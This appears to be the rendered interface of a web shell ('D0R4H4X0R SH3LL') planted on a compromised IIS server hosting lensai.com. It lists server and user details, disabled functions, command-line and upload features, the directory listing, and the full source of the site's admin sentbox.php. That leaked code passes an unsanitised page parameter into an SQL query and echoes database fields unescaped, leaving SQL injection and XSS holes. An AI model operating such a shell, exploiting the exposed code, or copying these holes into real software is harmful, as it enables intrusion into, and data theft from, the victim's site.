D0R4H4X0R SH3LL

Server Information

Server: Microsoft-IIS/10.0
System: Windows NT BH-PLESK-WEB3 10.0 build 20348 (Windows Server 2022) AMD64
User: IWPD_8556(lensai) ( 0 )
PHP Version: 8.3.21
Python Version: Python is not available
Disabled Functions:, Cron, Curl, Ftp, GCC, Mail, Mysql, PKEXEC, Perl, Python, SendMail, Ssh, Wget, exec, passthru, shell_exec, system

Features

Command Line

Find Longest Directory Path

Scan New PHP Files

Upload File

Directory: D:/INETPUB/VHOSTS/lensai.com/httpdocs/new/admin/mailbox/

Current File : D:/INETPUB/VHOSTS/lensai.com/httpdocs/new/admin/mailbox/sentbox.php

<?php
include_once('config.php');


?>
<!-- Content Wrapper. Contains page content -->
      <div>
        <!-- Content Header (Page header) -->
        <section class="content-header">
          <h1>
            Mailbox
            <small>13 new messages</small>
          </h1>
          <ol class="breadcrumb">
            <li><a href="#"><i class="fa fa-dashboard"></i> Home</a></li>
            <li class="active">Sentbox</li>
          </ol>
        </section>

        <!-- Main content -->
		<form action="controller.php" method="POST">
        <section class="content">
          <div class="row">
            <?php include_once'mail_control.php';?>
            <div class="col-md-9">
              <div class="box box-primary">
                <div class="box-header with-border">
                  <h3 class="box-title">Sentbox</h3>
                  <div class="box-tools pull-right">
                    <div class="has-feedback">
                      <input type="text" class="form-control input-sm" placeholder="Search Mail">
                      <span class="glyphicon glyphicon-search form-control-feedback"></span>
                    </div>
                  </div><!-- /.box-tools -->
                </div><!-- /.box-header -->
				 <?php
					$start = 0;
					$rpp = 10;
					if(isset($_GET['page'])){
					$page = $_GET['page'];
					$total = $page * $rpp;
					$start = $total - $rpp;
					}
					$select="select * From mailbox where`category`='sent' order by id DESC limit $start, $rpp";
					$sql=mysqli_query($con, $select);		
				 ?>
                <div class="box-body no-padding">
                  <div class="mailbox-controls">
                    <!-- Check all button -->
                    <button class="btn btn-default btn-sm checkbox-toggle"><i class="fa fa-square-o"></i></button>
                    <div class="btn-group">
                      <button class="btn btn-default btn-sm"><i class="fa fa-trash-o"></i></button>
                      <button class="btn btn-default btn-sm"><i class="fa fa-reply"></i></button>
                      <button class="btn btn-default btn-sm"><i class="fa fa-share"></i></button>
                    </div><!-- /.btn-group -->
                    <button class="btn btn-default btn-sm"><i class="fa fa-refresh"></i></button>
                    <div class="pull-right">
                      
						<?php
							for($i=1;$i<4;$i++){
							echo "<a href='index.php?page=mailbox/sentbox/".$i."'>".$i."&nbsp;&nbsp;&nbsp;</a>";
							}
						?>
                      
                    </div><!-- /.pull-right -->
                  </div>
                  <div class="table-responsive mailbox-messages">
                    <table class="table table-hover table-striped">
                      <tbody>
                        <?php
						
						while($row=mysqli_fetch_array($sql)){		
						?>
                        <tr>
                          <td><input type="checkbox" name="id" value="<?php echo $row['subject']; ?>"></td>
                          <td class="mailbox-star"><a href="#"><i class="fa fa-star-o text-yellow"></i></a></td>
                          <td class="mailbox-name"><a href="index.php?p="><?php echo $row['mail_id']; ?></a></td>
                          <td class="mailbox-subject"><b><?php echo $row['subject']; ?></b>&nbsp; &nbsp;<small><?php echo $row['message']; ?></small></td>
                          <td class="mailbox-date">28 mins ago</td>
                        </tr>
						<?php } ?>
                      </tbody>
                    </table><!-- /.table -->
                  </div><!-- /.mail-box-messages -->
                </div><!-- /.box-body -->
                <div class="box-footer no-padding">
                  <div class="mailbox-controls">
                    <!-- Check all button -->
                    <button class="btn btn-default btn-sm checkbox-toggle"><i class="fa fa-square-o"></i></button>
                    <div class="btn-group">
                      <button type="submit" name="delete_mail_from_admin" class="btn btn-default btn-sm"><i class="fa fa-trash-o"></i></button>
                      <button class="btn btn-default btn-sm"><i class="fa fa-reply"></i></button>
                      <button class="btn btn-default btn-sm"><i class="fa fa-share"></i></button>
                    </div><!-- /.btn-group -->
                    <button class="btn btn-default btn-sm"><i class="fa fa-refresh"></i></button>
                    <div class="pull-right">
                      1-50/200
                      <div class="btn-group">
                        <button class="btn btn-default btn-sm"><i class="fa fa-chevron-left"></i></button>
                        <button class="btn btn-default btn-sm"><i class="fa fa-chevron-right"></i></button>
                      </div><!-- /.btn-group -->
                    </div><!-- /.pull-right -->
                  </div>
                </div>
              </div><!-- /. box -->
            </div><!-- /.col -->
          </div><!-- /.row -->
        </section><!-- /.content -->
		</form>
      </div><!-- /.content-wrapper -->
compose.php 2.394 KB
File -rw-rw-rw-
File -rw-rw-rw-
login.php 0.582 KB
File -rw-rw-rw-
mail_control.php 2.098 KB
File -rw-rw-rw-
mailbox.php 4.800 KB
File -rw-rw-rw-
read-mail.php 3.260 KB
File -rw-rw-rw-
sentbox.php 5.021 KB
File -rw-rw-rw-
test.html 0.006 KB
File -rw-rw-rw-
D0R4H4X0R SH3LL